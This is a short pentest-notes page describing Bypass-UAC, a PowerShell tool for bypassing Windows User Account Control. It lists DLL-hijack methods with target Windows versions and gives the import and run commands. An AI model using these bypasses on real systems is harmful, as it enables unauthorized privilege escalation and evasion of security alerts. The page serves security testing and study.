# Bypass-UAC

Bypass-UAC provides a framework to perform UAC bypasses based on auto elevating IFileOperation COM object method calls. This is not a new technique, traditionally, this is accomplished by injecting a DLL into "explorer.exe". This is not desirable because injecting into explorer may trigger security alerts and working with unmanaged DLL's makes for an inflexible work-flow. 

Link: <https://github.com/FuzzySecurity/PowerShell-Suite/tree/master/Bypass-UAC>&#x20;

## Usage&#x20;

Bypass-UAC is self-contained and does not have any dependencies, bar a requirement that the target have PowerShell v2.&#x20;

Methods:&#x20;

```
* UacMethodSysprep: Original technique by Leo Davidson (sysprep -> cryptbase.dll) 
  * Targets: x32/x64 Windows 7 & 8 
* ucmDismMethod: Hybrid method (PkgMgr -> DISM -> dismcore.dll) 
  * Targets: x64 Win7+ (currently unpatched) 
* UacMethodMMC2: Hybrid method (mmc -> rsop.msc -> wbemcomn.dll) 
  * Targets: x64 Win7+ (currently unpatched) 
* UacMethodTcmsetup: Hybrid method (tcmsetup -> tcmsetup.exe.local -> comctl32.dll) 
  * Targets: x32/x64 Win7+ (UAC "0day" ¯\_(ツ)_/¯) 
* UacMethodNetOle32: Hybrid method (mmc some.msc -> Microsoft.NET\Framework[64]\..\ole32.dll) 
  * Targets: x32/x64 Win7+ (UAC "0day" ¯\_(ツ)_/¯) 
```

Run:

```
Import-Module Bypass-UAC.ps1
or 
. .\Bypass-UAC.ps1
Bypass-UAC -Method UacMethodSysprep

```

Win10 Example

&#x20;<img src="https://firebasestorage.googleapis.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-M4xwp6Mq18nX8yR4M5z%2Fuploads%2F4ygWVJL8coewhEP6DqiI%2Ffile.png?alt=media" alt="UacMethodTcmsetup" data-size="original">